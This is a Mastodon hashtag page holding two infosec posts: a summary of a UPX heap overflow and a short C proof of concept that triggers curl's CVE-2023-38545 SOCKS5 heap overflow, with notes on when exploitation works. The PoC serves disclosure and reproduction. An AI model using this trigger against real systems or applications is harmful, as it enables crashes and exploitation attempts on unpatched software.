Recent searches

No recent searches

Search options

Only available when logged in.
101010.pl is one of the many independent Mastodon servers you can use to participate in the fediverse.
101010.pl czyli najstarszy polski serwer Mastodon. Posiadamy wpisy do 2048 znaków.

Administered by:

Server stats:

513
active users

101010.pl: AboutStatusProfiles directoryPrivacy policy

Mastodon: AboutGet the appKeyboard shortcutsView source codev4.4.0-beta.1

#heapoverflow

0 posts0 participants0 posts today
🛡 H3lium@infosec.exchange/:~# :blinking_cursor:

Heap Buffer Overflow in UPX Identified

Date: March 26, 2024
CVE: To be assigned
Vulnerability Type: Buffer Errors
CWE: [[CWE-122]]
Sources: NIST VULNDB VULNDB Submit

Issue Summary

A heap buffer overflow vulnerability was identified in the [[UPX|Ultimate Packer for eXecutables]] (UPX), specifically in the commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d. This issue occurs during the handling of certain data structures, leading to potential memory corruption. The vulnerability was discovered through fuzzing techniques using the Google OSS-Fuzz project.

Technical Key findings

The vulnerability is caused by improper handling of input data, resulting in a heap buffer overflow. This overflow occurs in the handling of packed files during decompression, where the bounds of allocated heap memory are not properly checked.

Vulnerable products

  • [[UPX]] version identified by commit 06b0de9c77551cd4e856d453e094d8a0b6ef0d6d.

Impact assessment

An attacker could exploit this vulnerability to execute arbitrary code on the target system or cause a denial of service through application crash, potentially compromising the system's integrity and availability.

Patches or workaround

No specific patches or workarounds were mentioned at the time of reporting. Users are advised to monitor the official [[UPX]] GitHub repository for updates.

Tags

nvd.nist.govNVD - CVE-2024-3209
#UPX#BufferOverflow#HeapOverflow
Harry Sintonen

Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at curl.se/docs/CVE-2023-38545.ht for more details.

#infosec
TrendingLive feeds
About